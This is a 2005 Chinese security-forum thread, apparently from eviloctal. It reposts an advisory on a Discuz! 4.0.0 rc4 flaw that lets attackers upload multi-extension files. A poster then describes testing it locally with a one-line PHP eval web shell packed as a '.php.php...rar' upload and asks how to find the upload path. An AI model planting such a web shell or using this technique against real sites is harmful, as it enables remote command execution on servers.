信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

Discuz! - "popular web forum applications in China".

Due to input validation flaw, malicious attackers can cause the Discuz program to run arbitrary commands with the privilege of the HTTPD process.  
  
Credit:
The information has been provided by SSR Team.  
  
Details
Vulnerable Systems:
* Discuz! version 4.0.0 rc4 and prior

Discuz! doesn't properly check multiple extensions of uploaded files, allowing malicious attackers to upload a file with multiple extensions such as attach.php.php.php.php.rar to a web server.

This can be exploited to run arbitrary commands with the privilege of the HTTPD process, which is typically run as the nobody user.

Workaround:
Exclude the RAR extension from the extension list for attached files on an administration page and wait the release of official patch.

Disclosure Timeline:
* 24.07.05 - Vulnerability found
* 25.07.05 - Vendor notified
* 12.08.05 - Official release  
这是在http://www.securiteam.com/unixfocus/5WP0F1FGKG.html 站点上看到的漏洞公告
自己马上在本地进行了测试，事实证明可以执行任意指令，用<?php eval($_POST[cmd]);?>
存为cmd.php再打包成p11.php.php.php.php.php.php.php.php.php.php.php.php.rar
上传到数据库，更名为p11.php.php.php.php.php.php.php.php.php.php.php.php_6nOXtmZPWv90.rar
可看出文件名已经修改，可是自己是看不到后面这个文件名的，也就没有路径自己。
抓包，嗅探都找不到文件路径，然后自己进后台，附件管理，可查看文件名，用lanker 马客户端
连接可执行命令，难点是如何的到上传文件路径，昨晚努力了很久，都无法获得路径
以前也来EST，就是经常潜水，现在好不容易有问题可以提出，本人菜鸟一个，在此求助帮忙
Vulnerable Systems:
* Discuz! version 4.0.0 rc4 and prior，漏洞非常之广，反盗链技术discuz又好
真的不是象我这样的菜鸟能搞定漏洞利用的，依然在研究代码中

引用:

下面是引用k4u于2005-08-19 14:26发表的[转载]discuz附件文件下载路径获得以及多后缀RAR执行任意指令漏洞:
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

Discuz! - "popular web forum applications in China".

Due to input validation flaw, malicious attackers can cause the Discuz program to run arbitrary commands with the privilege of the HTTPD process.  
.......

44444

这个漏洞太麻烦了，只有Httpd权限啊，累死你

这个似乎只有猜了